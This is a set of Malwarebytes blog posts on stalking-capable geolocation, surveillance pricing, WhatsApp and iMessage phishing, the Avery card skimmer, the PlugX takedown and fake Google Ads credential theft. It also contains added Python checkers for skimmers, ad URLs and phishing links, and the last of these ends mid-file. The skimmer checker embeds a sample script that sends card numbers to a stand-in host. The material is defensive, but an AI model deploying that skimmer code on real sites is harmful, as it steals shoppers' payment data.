Malware Bytes Security
AI tool GeoSpy analyzes images and identifies locations in seconds
It’s just become even more important to be conscious about the pictures we post online.
GeoSpy is an Artificial Intelligence (AI) supported tool that can derive a person’s location by analyzing features in a photo like vegetation, buildings, and other landmarks. And it can do so in seconds based on one picture.
Graylark Technologies, which makes GeoSpy, says it has been developed for government and law enforcement. But investigative journalists from 404 Media report that the tool has also been used for months by members of the public, with many making videos marveling at the technology, and some asking for help with stalking specific women.
404 Media says the company trained GeoSpy on millions of images from around the world and can recognize distinct geographical markers such as architectural styles, soil characteristics, and their spatial relationships.
Using the tool to determine anyone’s location requires virtually no training, so anybody can do it. Normally, open source intelligence (OSINT) professionals need considerable training and experience to reach the level of speed and accuracy that GeoSpy delivers to an untrained individual.
This means that even the least tech-savvy individual could find a person of interest based on pictures posted on social media, despite the fact that social media platforms strip the metadata—which could include GPS coordinates or other useful information—from these pictures.
Based on its testing and conversations with users, 404 Media concluded:
“GeoSpy could radically change what information can be learned from photos posted online, and by whom.”
Even if the tool is unable to narrow down the location to an exact street address or block, it can bring the search area down to a few square miles based on vegetation alone.
The company’s founder says he has pushed back against requests from people asking to track particular women. After 404 Media asked him for comment, GeoSpy closed off public access to the tool.
Aside from its contribution to a surveillance society, the risks of such a tool are obvious. It poses several significant dangers, particularly concerning privacy, security, and potential abuse if a stalker can access it. Another worry concerns the security of the storage for the data that is used and found by this tool. If that storage is involved in a breach, a host of information could become available to cybercriminals.
We don’t just report on threats – we help protect your social media
Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.
Your location or browsing habits could lead to price increases when buying online
Companies are showing customers different prices for the same goods and services based on what data they have on them, including details like their precise location or browser history.
The name for this method is surveillance pricing, and the FTC has just released initial findings of a report looking into that practice. In July 2024, the FTC requested information from eight companies offering surveillance pricing products and services that incorporate data about consumers’ characteristics and behavior.
The goal was to get a better understanding of the “shadowy market” that third-party intermediaries use to set individualized prices for products and services based on consumers’ characteristics and behaviors, like location, demographics, browsing patterns, and shopping history.
Speaking to staff at these firms, the FTC found that behaviors ranging from mouse movements on a webpage to the type of products that consumers leave in an online shopping cart without clicking Buy can be tracked and used by retailers to tailor consumer pricing.
The intermediaries claimed they used advanced algorithms, artificial intelligence, and other technologies, along with personal information about consumers to determine targeted prices.
FTC chair Lina M. Khan said:
“Americans deserve to know whether businesses are using detailed consumer data to deploy surveillance pricing, and the FTC’s inquiry will shed light on this shadowy ecosystem of pricing middlemen.”
The first priorities to investigate are:
- The types of products and services engaged in surveillance pricing
- Data sources and who collected them
- Who the potential customers are
- How surveillance pricing impacted the prices offered to these customers.
This is nothing new: we’ve seen numerous times that insurance companies are very interested in our lifestyle and will happily charge more, or even refuse to take us on as customers, if they think we’re too much of a risk.
But, needless to say, surveillance pricing can have serious consequences, not only for our privacy, but also for fair competition and for consumer protection.
Probably the most shocking thing is the type of information that could be involved. The FTC notes that some of these companies even created lists of people suffering from diseases for the purpose of targeting them with offers for ineffective or worthless cures. This makes the introduction of a bill saying data brokers should stop trading health and location data perfectly understandable.
What can you do?
When it comes to sharing data online, we’ve all heard someone say, “What’s the big deal when I have nothing to hide?”
Well, this is exactly the deal: by exposing their private data online, they might well end up with companies charging them more. It’s a no-brainer that we should all be sharing as little as possible. Here’s how:
- Limit what you share on social media as much as possible, and try to keep personal data out of photos and written posts
- Only tell companies the information that they need for the service or product they’re providing. Use false information as much as possible
- If you are asked to share your location data with an app and there’s no clear reason why you might need to, deny the app that permission
- If you have to share your location—for example, when using a map app—choose the “Allow only while using the app” option, so that it will be unable to continuously track your location and movement
- Read privacy policies, however boring they are. Understand how the company will be using your data
- Block web tracking wherever you can. Malwarebytes Browser Guard automatically declines the cookie consent banners you see on websites, opting you out of data collection performed by tracking cookies (and it’s free).
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
A week in security (January 13 – January 19)
Last week on Malwarebytes Labs:
- iMessage text gets recipient to disable phishing protection so they can be phished
- The new rules for AI and encrypted messaging, with Mallory Knodel (Lock and Code S06E01)
- Insurance company accused of using secret software to illegally collect and sell location data on millions of Americans
- The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads
- PlugX malware deleted from thousands of systems by FBI
- Avery had credit card skimmer stuck on its site for months
- WhatsApp spear phishing campaign uses QR codes to add device
Last week on ThreatDown:
- Web shop spreads SocGholish malware and steals credit cards
- 8 zero-days in one Patch Tuesday? Welcome to 2025
Stay safe!
Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
WhatsApp spear phishing campaign uses QR codes to add device
A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members of think tanks, and employees of non-governmental organizations (NGOs), according to new details revealed by Microsoft.
The group, which Microsoft tracks by the name “Star Blizzard,” is also referred to as Coldriver by other researchers. Last year, the group created impersonation accounts where members posed as experts in a field that their targets might be interested in—or that was somehow affiliated with the target. Once a relationship had been established, the target would receive a phishing link or a document that contained a phishing link.
But over time, that tactic became widely known, and part of the cybercriminals’ infrastructure was taken down. Now, it seems the group has changed tactics and is sending QR codes instead of malicious links to the targets that they have established an initial relationship with.
These QR codes do not take the target to a malicious website, nor will they join them to the promised WhatsApp group on “the latest non-governmental initiatives aimed at supporting Ukraine NGOs,” as is claimed in one of the cybercriminal lures.
In reality, the link in the QR code is intentionally broken. The idea is that the target will respond with a remark about the broken link. When that happens, the cybercriminals send out a shortened URL to a website that displays another QR code.
Screenshot courtesy of Microsoft
“I apologize for the inconvenience with the QR code. Kindly try this alternative link: US-Ukraine NGOs Group
It should work without any issues.”
By scanning this QR code and following the instructions on the website, the target confirms the addition of an extra device to their WhatsApp account. With that access, the group can read the messages in the target’s WhatsApp account and use existing browser plugins, particularly those designed for exporting WhatsApp messages from an account accessed via WhatsApp Web.
How to stay safe
These spear phishing campaigns are highly targeted and you’ll probably never see an invite to this group. But cybercriminals tend to copy ideas that work, so you may see them in another form.
There are a few simple rules that will help you avoid this kind of phishing.
- Always hover over links before clicking them.
- When you find a shortened URL, think about the possible reason for shortening. Was there a real need to do this or is it just meant to hide the destination?
- When still in doubt, unshorten the URL.
- When following instructions on a website, scrutinize whether the prompts on your device actually match the expected ones. WhatsApp will double-check whether you want to add a device to the account.
- Double-check whether the sender is who they claim to be through another method of contact.
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.
Avery had credit card skimmer stuck on its site for months
The consequences of a wave of credit card skimmers—which is normal around the holidays—are starting to show.
Label maker Avery has filed a data breach notification, saying 61,193 people may have had their credit card details stolen.
On December 9, Avery said it became aware of an attack on its systems. An investigation showed that cybercriminals had inserted malicious software that was used to “scrape” credit card information used on its website. This credit card skimmer was active between July 18, 2024, and December 9, 2024.
Avery has sent emails to affected customers to let them know their data has been stolen.
The information potentially included:
- First and last name
- Billing and shipping address
- Email address
- Phone number if provided
- Payment card information including CVV number and expiration date
- Purchase amount
Avery says it has received a number of reports from affected customers who said that they incurred a fraudulent charge and/or received a phishing email.
A credit card skimmer is a piece of malware that is injected into a website, often through vulnerabilities in the content management system (CMS) or the plugins that the site owner uses.
When visiting a site that has a card skimmer on it, you’re unlikely to even know it is there. The criminals behind card skimmers are adept at injecting JavaScript code, especially into web shops, which rely heavily on that type of code, so the extra code is less likely to stand out. Sadly, card skimmers are all too commonplace, but there are things you can do to prevent your details being caught by one.
How to protect yourself from card skimmers
- Run a security solution and keep it up to date. Most antivirus products—including Malwarebytes Premium—offer some kind of web protection that detects malicious domains and IP addresses.
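Because a skimmer blends into the JavaScript a shop already loads, one practical check for a site owner is to list every script origin on the checkout page and flag anything outside a known allowlist. The following example is added here and is not code from Malwarebytes or from the Avery incident: the checkout HTML, the allowlisted hosts and the injected script are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed checkout page (not from any real shop): the shop's own script, a
# CDN script, an injected third-party script, and an injected inline script that
# reads the card field and posts it elsewhere.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://cdn.example/lib/jquery.min.js"></script>
<script src="https://static-analytics.example/s.js"></script>
</head><body>
<form id="payment">
  <input name="cc_number"><input name="cvv"><input name="exp">
</form>
<script>
  document.querySelector('[name=cc_number]').addEventListener('change', function(e){
    fetch('https://static-analytics.example/c', {method:'POST', body:e.target.value});
  });
</script>
</body></html>
"""

# Assumption for this example: the hosts the shop owner expects to serve script.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}
# Field names a skimmer would need to read; matched against inline script text.
PAYMENT_FIELD_HINTS = ("cc_number", "cvv", "cardnumber", "card_number")
# Calls that send data off the page.
OUTBOUND_HINTS = ("fetch(", "XMLHttpRequest", "sendBeacon")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute of each <script src=...>
        self.inline = []        # text of each inline <script> block
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_data(self, data):
        # HTMLParser hands script content to handle_data as raw text.
        if self._in_inline:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return findings: (kind, detail) for each script host not on the allowlist
    and for each inline script that both reads payment fields and sends data out."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlsplit(src).hostname or ""
        if host not in allowed_hosts:
            findings.append(("unknown-script-host", host))
    for body in parser.inline:
        reads_card = any(hint in body for hint in PAYMENT_FIELD_HINTS)
        sends_out = any(hint in body for hint in OUTBOUND_HINTS)
        if reads_card and sends_out:
            findings.append(("inline-payment-exfil", body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_CHECKOUT_HTML):
        print(kind, detail)
```

Run against a real checkout page, the same audit belongs in a scheduled integrity check so that a newly appearing script host or inline block is noticed within hours rather than months.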
- Enable in-browser protection. Malwarebytes Browser Guard—a browser extension available for Chrome, Edge, Firefox and Safari—blocks card skimmers. It also stops annoying ads and trackers, warns about breaches, and flags malicious websites. You can see it in action here, blocking a piece of JavaScript hosted on an otherwise legitimate site:
- Keep an eye on your financial statements. Regularly check your online bank and credit card statements. Flag anything that seems suspicious.
- Set up identity and credit monitoring. Identity monitoring alerts you if your personal information is found being illegally traded online, and helps you recover after. Credit monitoring tracks your credit report and borrowing behavior and alerts you if anything changes. A breached company may offer this as a service to you (like Avery is), but you can also get different levels of monitoring solutions, depending on your individual need.
More information on how to act after falling victim to a data breach can be found in our article: Involved in a data breach? Here’s what you need to know.
PlugX malware deleted from thousands of systems by FBI
The FBI says it has removed PlugX malware from thousands of infected computers worldwide.
The move came after suspicion that cybercriminal groups under the control of the People’s Republic of China (PRC) used a version of PlugX malware to control victims’ computers and steal information from them.
PlugX has been around since at least 2008 but is under constant development. With the remote access it provides criminals, it is often used to spy on users and plant additional malware on interesting systems.
Among others, the PlugX Remote Access Trojan (RAT) was used in a long-running campaign uncovered last year in which a Chinese group known as “Velvet Ant” used compromised F5 BIG-IP appliances to gain access to networks, managing to stay hidden for years.
US Attorney Jacqueline Romero for the Eastern District of Pennsylvania commented:
“This wide-ranging hack and long-term infection of thousands of Windows-based computers, including many home computers in the United States, demonstrates the recklessness and aggressiveness of PRC state-sponsored hackers.”
After researchers found that thousands of infected machines reported to one specific IP address, they managed to seize control of that IP address, which served as a Command & Control (C2) server.
In close cooperation with the French authorities, the FBI and Justice Department used this IP address to “sinkhole” the botnet. Sinkholing in this context means redirecting traffic from its original destination to one specified by the sinkhole owners. The altered destination is known as the sinkhole.
With control of the sinkhole, a specially configured DNS server can simply route the requests of the bots to a fake C2 server. This provides the controller of the sinkhole with valuable information about the affected systems and an opportunity to send commands to delete the PlugX version from the connecting devices.
FBI Special Agent in Charge Wayne Jacobs of the FBI Philadelphia Field Office said:
“The FBI worked to identify thousands of infected US computers and delete the PRC malware on them. The scope of this technical operation demonstrates the FBI’s resolve to pursue PRC adversaries no matter where they victimize Americans.”
The FBI says it is notifying those who had the malware deleted from their computers via their internet service providers (ISPs).
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads
- Overview
- Criminals impersonate Google Ads
- Lures hosted on Google Sites
- Phishing for Google account credentials
- Victimology
- Who is behind these campaigns?
- Fuel for other malware and scam campaigns
- Indicators of Compromise
Online criminals are targeting individuals and businesses that advertise via Google Ads by phishing them for their credentials — ironically — via fraudulent Google ads.
The scheme consists of stealing as many advertiser accounts as possible by impersonating Google Ads and redirecting victims to fake login pages. We believe their goal is to resell those accounts on blackhat forums, while also keeping some to themselves to perpetuate these campaigns.
This is the most egregious malvertising operation we have ever tracked, getting to the core of Google’s business and likely affecting thousands of their customers worldwide. We have been reporting new incidents around the clock and yet keep identifying new ones, even at the time of publication.
The following diagram illustrates at a high level the mechanism by which advertisers are getting fleeced:
Figure 1: Process flow for this Google Ads heist campaign
Criminals impersonate Google Ads
Advertisers are constantly trying to outbid each other to reach potential customers by buying ad space on the world’s number one search engine. This earned Google a whopping $175 billion in search-based ad revenues in 2023. Suffice it to say, the budgets spent on advertising can be considerable and of interest to crooks for a number of reasons.
We first started noticing suspicious activity related to Google accounts somewhat accidentally, and after a deeper look we were able to trace it back to malicious ads for… Google Ads itself! Very quickly we were overwhelmed by the onslaught of fraudulent “Sponsored” results, specifically designed to impersonate Google Ads, as can be seen in Figure 2:
Figure 2: A malicious ad masquerading as Google Ads
While it is hard to believe such a thing could actually happen, the proof is there when you click on the 3-dot menu that shows more information about the advertiser. We have partially masked the victim’s name, but clearly it is not Google; they are just one of the many accounts that have already been compromised and abused to trick more users:
Figure 3: The advertiser behind this ad is not affiliated with Google at all
People who will see those ads are individuals or businesses that want to advertise on Google Search or already do. Indeed, we saw numerous ads specifically for each scenario, sign up or sign in, as seen in Figure 4:
Figure 4: Two ads for signing up and signing in to Google Ads respectively
The fake ads for Google Ads come from a variety of individuals and businesses, in various locations. Some of those hacked accounts already had hundreds of other legitimate ads running, and one of them was for a popular Taiwanese electronics company.
Figure 5: Victim accounts spending their own budgets on fake Google Ads
To get an idea of the geographic scope of these campaigns, we performed the same Google search simultaneously from several different geolocations (using proxies). First, here’s the malicious ad from a U.S. IP address belonging to a business registered in Paraguay:
Figure 6: U.S.-based search showing fake Google ad
Now, here’s that same ad as it appears on Google Search in several other countries:
Figure 7: The same ad found in different countries
Lures hosted on Google Sites
Once victims click on those fraudulent ads, they are redirected to a page that looks like Google Ads’ home page, but oddly enough, it is hosted on Google Sites. These pages act as a sort of gateway to external websites specifically designed to steal the usernames and passwords from the coveted advertisers’ Google accounts.
Figure 8: A malicious Google Sites page impersonating Google Ads
There’s a good reason to use Google Sites, not only because it’s a free and disposable commodity but also because it allows for complete impersonation. Indeed, you cannot show a URL in an ad unless your landing page (final URL) matches the same domain name. While that is a rule meant to prevent abuse and impersonation, it is one that is very easy to get around.
Figure 9: The rule that stipulates display URLs and final URLs must have matching domains
Looking back at the ad and the Google Sites page, we see that this malicious ad does not strictly violate the rule, since sites.google.com uses the same root domain as ads.google.com. In other words, it is allowed to show this URL in the ad, making it indistinguishable from the same ad put out by Google LLC.
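To make the gap in that rule concrete, here is an added example (not code from Malwarebytes or Google) that models the root-domain check the ad policy applies and compares it with a stricter full-host check. The root-domain logic is a deliberate simplification (last two labels, no Public Suffix List), and the landing URLs are constructed placeholders.

```python
from urllib.parse import urlsplit

# Added example: models the display-URL rule quoted in the post (display URL and
# final URL must share a root domain) and shows why a sites.google.com landing
# page passes it. Not the policy engine Google actually runs.


def host_of(url):
    """Extract the host from a URL or bare host name (scheme is assumed if absent)."""
    if "://" not in url:
        url = "https://" + url
    return urlsplit(url).hostname or ""


def registrable_domain(host):
    """Last two labels of a host, e.g. 'sites.google.com' -> 'google.com'.
    Simplification for this example: a real check consults the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def passes_display_url_rule(display_url, final_url):
    """The root-domain match the post describes: this is what lets a Google Sites
    landing page be advertised under ads.google.com."""
    return registrable_domain(host_of(display_url)) == registrable_domain(host_of(final_url))


def passes_strict_host_rule(display_url, final_url):
    """A stricter variant: the full host must match, so sites.google.com cannot be
    shown as ads.google.com."""
    return host_of(display_url) == host_of(final_url)


# Constructed cases modelled on the three situations the post describes.
CASES = [
    ("ads.google.com", "https://ads.google.com/home/"),                   # genuine
    ("ads.google.com", "https://sites.google.com/view/PLACEHOLDER-LURE"),   # Google Sites lure
    ("ads.google.com", "https://phishing-portal.example/login"),            # off-domain phishing host
]


def evaluate(cases=CASES):
    """Return (display, final, passes_root_rule, passes_strict_rule) per case."""
    return [
        (display, final, passes_display_url_rule(display, final), passes_strict_host_rule(display, final))
        for display, final in cases
    ]


if __name__ == "__main__":
    for display, final, root_ok, host_ok in evaluate():
        print(f"{display} -> {final}: root-domain rule {'PASS' if root_ok else 'FAIL'}, "
              f"full-host rule {'PASS' if host_ok else 'FAIL'}")
```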
Figure 10: The malicious ad does not violate Google’s rule on the use of the display URL
Phishing for Google account credentials
After the victims click on the “Start now” button found on the Google Sites page, they are redirected to a different site which contains a phishing kit. JavaScript code fingerprints users while they go through each step to ensure all important data is being surreptitiously collected.
Figure 11: The actual phishing page that follows
Finally, all the data is combined with the username and password and sent to the remote server via a POST request. We see that criminals even receive the victim’s geolocation, down to the city and internet service provider.
Figure 12: POST web request with victim’s details
Victimology
There are multiple online reports of people who saw the fake Google Ads and shared their experiences:
- Help with removing a dangerous scam in Google Ads (Google Ads Help forum)
- Google Ads Phishing Scam (Reddit)
- It’s just me or Google just sponsored a link to a phising site for Google ads? (Reddit)
- Be aware of fake google page, clicked by accident (Reddit)
- Warning! First sponsorized google answer for “Google ads” is a phishing attempt ! (BlueSky)
We were able to get in touch with a couple of victims who not only saw the ads but were actually scammed and lost money. Thanks to their testimony and our own research, we have a better idea of the criminals’ modus operandi:
- Victim enters their Google account information into phishing page
- Phishing kit collects unique identifier, cookies, credentials
- Victim may receive an email indicating a login from an unusual location (Brazil)
- If the victim fails to stop this attempt, a new administrator is added to the Google Ads account via a different Gmail address
- Threat actor goes on a spending spree, locks out victim if they can
We identified two main groups of criminals running this scheme, but the more prolific by far is one made up of Portuguese speakers likely operating out of Brazil. Victims have also shared that they had received a notification from Google indicating suspicious logins from Brazil. Unfortunately, those notifications often came too late or were dismissed as legitimate, and the criminals already had time to do some damage.
We should also note a third campaign that is very different from the other two, and where the threat actors’ main goal is to distribute malware. The Google Ads phishing scheme may have been a temporary run which was not their main focus.
Brazilian team
In the span of a few days, we reported over 50 fraudulent ads to the Google Ads team, all coming from this Brazilian group. We quickly realized that no matter how many incidents were reported and taken down, the threat actors managed to keep at least one malicious ad running 24/7.
Figure 13 shows the network traffic resulting from a click on the ad. You will see multiple hops before finally arriving at the phishing portal. The second URL shows the crooks are using a paid service to detect fake traffic.
Figure 13: Network traffic from the ‘Brazilian campaign’
Within the JavaScript code that is part of the phishing kit, there are comments in Portuguese. Figure 14 shows a portion of the code that does browser fingerprinting, which is a way of identifying users. Browser language, system CPU, memory, screen width, and time zone are some of the data points collected and then hashed.
Figure 14: Identifying users via various settings
Asian team
The second group is using advertiser accounts from Hong Kong and appears to be Asia-based, perhaps from China. Interestingly, they also use the same kind of delivery chain by leveraging Google Sites. However, their phishing kit is entirely different from their Brazilian counterparts’.
Figure 15: Web traffic for the ‘Chinese campaign’
Figure 16 below shows a code extract with comments in Chinese, as well as a function called xianshi, which could be a reference to a Chinese general of the late Qing dynasty or even a superhero from more modern gaming and literature.
Figure 16: Code with comments in Chinese
Third campaign (possibly Eastern European)
We observed another campaign which has a very different modus operandi. Google Sites is not involved at all; instead they rely on a fake CAPTCHA lure and heavy obfuscation of the phishing page.
Interestingly, the malicious ad we found was for Google Authenticator, despite the obvious ads-goo[.]click domain name. However, for about a day or so, the redirect from that domain led directly to a phishing portal hosted at ads-overview[.]com.
The reason we suggest the threat actors may be Eastern European here is the type of redirects and obfuscation. There is also a faint resemblance to the ‘software download via Google ads’ campaigns we have reported on previously (see Threat actor impersonates Google via fake ad for Authenticator).
Figure 17: A malicious ad for Google Authenticator and fake CAPTCHA
A PHP script (cloch.php) then determines if the visitor is genuine or not (likely doing a server-side IP check). VPNs, bots, and detection tools will get a “white” page showing some bogus instructions on how to run a Google Ads campaign. Victims are instead redirected to ads-overview[.]com, which is a phishing portal for Google accounts.
Figure 18: Cloaking in action with a ‘white’ page or the phishing page
When we checked back on this campaign a few days later, we saw that the ad URL now redirected to a fake Google Authenticator site, likely to download malware. The redirection mechanism is shown in Figure 19:
Figure 19: Web traffic for fake Google Authenticator site
Fuel for other malware and scam campaigns
Stolen Google Ads accounts are a valuable commodity among thieves. As we have detailed many times on this blog, there are constant malvertising campaigns leveraging compromised advertiser accounts to buy ads that push scams or deliver malware.
- Printer problems? Beware the bogus help
- Malicious ad distributes SocGholish malware to Kaiser Permanente employees
- Hello again, FakeBat: popular loader returns after months-long hiatus
- Large scale Google Ads campaign targets utility software
If you think about it for a second, crooks are using someone else’s budget to continue spreading malfeasance. Whether those dollars are spent on legitimate ads or malicious ones, Google still earns revenue from those ad campaigns. The losers are the hacked advertisers and the innocent victims who are getting phished.
As a result, taking action on compromised ad accounts plays a key part in driving down malvertising attacks. Google has yet to show that it takes definitive steps to freeze such accounts until their security is restored, despite its own policy on the subject (Figure 20). For example, we recently saw a case where the same advertiser that had already been reported 30 times was still active.
Figure 20: Google’s policy regarding violations
As the scourge of fraudulent ads continues, we urge users to pay particular attention to sponsored results. Ironically, it’s quite possible that individuals and businesses that run ad campaigns are not using an ad-blocker (so they can see their ads and those from their competitors), making them even more susceptible to falling for these phishing schemes.
We don’t just report on threats—we block them
Cybersecurity risks should never spread beyond a headline. Keep threats off by downloading Malwarebytes Browser Guard today.
Indicators of Compromise
Fake Google Sites pages
Phishing domains
Insurance company accused of using secret software to illegally collect and sell location data on millions of Americans
Insurance company Allstate and its subsidiary Arity unlawfully collected, used, and sold data about the location and movement of Texans’ cell phones through secretly embedded software in mobile apps, according to Texas Attorney General Ken Paxton.
Attorney General Paxton says the companies didn’t give consumers notice or get their consent, which violates Texas’ new Data Privacy and Security Act.
Arity would pay app developers to incorporate software that tracks consumers’ driving data in their apps. When consumers installed these apps they unwittingly downloaded that software, which allowed Arity to monitor the consumer’s location and movement in real-time.
Using this method, the company collected trillions of miles worth of location data from over 45 million people across the US, and used the data to create the “world’s largest driving behavior database.”
Allstate then used the covertly obtained data to justify raising insurance rates, according to Attorney General Paxton. Allstate is accused of not just using the data for its own business, but also for selling it on to third parties, including other car insurance carriers.
Location and movement data is valuable for insurance companies when they are preparing a quote. By having insight into the driver’s behavior, they can offer a rate that covers the risk better.
Car manufacturers are known to be selling similar data on to insurance companies. Last year, Attorney General Paxton sued General Motors (GM) for the unlawful collection and sale of over 1.5 million Texans’ private driving data to insurance companies, also without their knowledge or consent.
Privacy violation aside, these companies don’t always keep the data safe. Just last week we spoke about a breach at data broker Gravy Analytics, which is said to have led to the loss of millions of people’s sensitive location data.
Back to the Allstate case, the Texas Data Privacy and Security Act (TDPSA) requires clear notice and informed consent regarding how a company will use Texans’ sensitive data. That is something which Allstate allegedly failed to do.
In the press release, Paxton states:
“Our investigation revealed that Allstate and Arity paid mobile apps millions of dollars to install Allstate’s tracking software. The personal data of millions of Americans was sold to insurance companies without their knowledge or consent in violation of the law. Texans deserve better and we will hold all these companies accountable.”
Protect your location data
Sometimes apps ask permission to use your location data and you find yourself wondering, why does this app need to know where my phone is?
This is one possible reason.
Whenever you are asked to share your location data with an app and there’s no clear reason why you might need to, deny the app that permission.
If you have to share your location—for example, when using a map app—choose the “Allow only while using the app” option, so that it will be unable to continuously track your location and movement.
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.
The new rules for AI and encrypted messaging, with Mallory Knodel (Lock and Code S06E01)
This week on the Lock and Code podcast…
The era of artificial intelligence everything is here, and with it, come everyday surprises into exactly where the next AI tools might pop up.
There are major corporations pushing customer support functions onto AI chatbots, Big Tech platforms offering AI image generation for social media posts, and even Google has defaulted to include AI-powered overviews into everyday searches.
The next gold rush, it seems, is in AI, and for a group of technical and legal researchers at New York University and Cornell University, that could be a major problem.
But to understand their concerns, there’s some explanation needed first, and it starts with Apple’s own plans for AI.
Last October, Apple unveiled a service it is calling Apple Intelligence (“AI,” get it?), which provides the latest iPhones, iPads, and Mac computers with AI-powered writing tools, image generators, proof-reading, and more.
One notable feature in Apple Intelligence is Apple’s “notification summaries.” With Apple Intelligence, users can receive summarized versions of a day’s worth of notifications from their apps. That could be useful for an onslaught of breaking news notifications, or for an old college group thread that won’t shut up.
The summaries themselves are hit-or-miss with users—one iPhone customer learned of his own breakup from an Apple Intelligence summary that said: “No longer in a relationship; wants belongings from the apartment.”
What’s more interesting about the summaries, though, is how they interact with Apple’s messaging and text app, Messages.
Messages is what is called an “end-to-end encrypted” messaging app. That means that only a message’s sender and its recipient can read the message itself. Even Apple, which moves the message along from one iPhone to another, cannot read the message.
But if Apple cannot read the messages sent on its own Messages app, then how is Apple Intelligence able to summarize them for users?
That’s one of the questions that Mallory Knodel and her team at New York University and Cornell University tried to answer with a new paper on the compatibility between AI tools and end-to-end encrypted messaging apps.
Make no mistake, this research isn’t into whether AI is “breaking” encryption by doing impressive computations at never-before-observed speeds. Instead, it’s about whether or not the promise of end-to-end encryption—of confidentiality—can be upheld when the messages sent through that promise can be analyzed by separate AI tools.
And while the question may sound abstract, it’s far from being so. Already, AI bots can enter digital Zoom meetings to take notes. What happens if Zoom permits those same AI chatbots to enter meetings that users have chosen to be end-to-end encrypted? Is the chatbot another party to that conversation, and if so, what is the impact?
Today, on the Lock and Code podcast with host David Ruiz, we speak with lead author and encryption expert Mallory Knodel on whether AI assistants can be compatible with end-to-end encrypted messaging apps, what motivations could sway current privacy champions into chasing AI development instead, and why these two technologies cannot co-exist in certain implementations.
“An encrypted messaging app, at its essence is encryption, and you can’t trade that away—the privacy or the confidentiality guarantees—for something else like AI if it’s fundamentally incompatible with those features.”
Tune in today to listen to the full conversation.
Show notes and credits:
Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)
Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.
Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.
iMessage text gets recipient to disable phishing protection so they can be phished
A smishing (SMS phishing) campaign is targeting iMessage users, attempting to socially engineer them into bypassing Apple’s built in phishing protection.
For months, iMessage users have been posting examples online of how phishers are trying to get around this protection. And, now, the campaign is gaining traction, according to our friends at BleepingComputer.
It works like this: Under normal circumstances, iMessage will disable all links in messages from unknown senders to protect the user against clicking them by accident. However, if a user replies to a message or adds the sender to their contact list, the links are enabled, allowing the person to click on the link.
The text of the messages comes in all the variations that phishers love to use:
- Undeliverable packages from USPS, EVRI, Royal Mail, DHL, Fedex, etc.
- Unpaid road toll.
- Owed shipping fees.
- Other outstanding payments that you are unaware of.
But they all end in a similar way to this:
“(Please reply Y, then exit the SMS, re-open the SMS activation link, or copy the link to open in Safari)”
Replying with Y (or actually anything) will enable the links and turn off iMessage’s built-in phishing protection. Clicking the link will then lead the recipient to whatever malicious website the phisher had in mind. Even if the user just replies with “Y” and then decides not to follow the link—because it looks slightly off—the phishers will know that they have found a likely target for more attacks.
It’s also important to know that there are similar instructions for the Chrome browser:
“Reply with 1, exit the SMS message, and reopen the SMS activation link, or copy the link to Google Chrome to open it.)”
How to avoid smishing scams
- Never reply to suspicious messages, even if it’s only a “Y” or “1.” It will tell the phishers they have a live number and they will bombard you with more attempts.
- Never add a number you don’t know to your Contacts as that will disable the iMessage protection as well.
- Don’t assume any message is the real deal. If you’re being asked to do something, contact the company directly via a known method you trust. If it turns out to be a fake, you should be able to report it to them, there and then.
- If you live somewhere with a Do Not Call list or spam reporting service, make full use of it. Report bogus messages and numbers.
- Your mobile device may already have some form of “safe” message ID enabled without you knowing. It’s tricky to give specific advice here because of the sheer difference of options available on models of phone, but the Options / Safety / Security / Privacy menus are a good place to start.
- Check the link before you click it or copy it into your browser. Is it exactly what you would expect it to be? Scammers often use typosquatting techniques (for example evri[.]top instead of the legitimate evri[.]com), or they fabricate a link that uses the subdomain to make it look legitimate (for example usps[.]com-track[.]infoam[.]xyz). If it doesn’t look real then don’t click on it.
- If a message sounds too good (or bad) to be true, it probably is.
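The two link tricks described in the list above (a lookalike top-level domain, and the brand name planted in a subdomain of an unrelated domain) both leave the registrable domain different from the brand’s real one, which is something a small script can check before anyone taps a link. The following is an added example, not code from the article or from Malwarebytes; the expected brand domains and the sample links are constructed for the example, and the defanged `[.]` notation follows the article’s own style.

```python
"""Check whether a link in a text message really belongs to the brand it claims.

Added example: compares the registrable domain of each link with the domain the
brand is known to use, and explains the mismatch when there is one.
"""
from urllib.parse import urlsplit

# Registrable domains the brands actually use; assumed for this example.
EXPECTED_DOMAINS = {"USPS": "usps.com", "EVRI": "evri.com"}

# Constructed sample links (not taken from real messages), defanged with [.]
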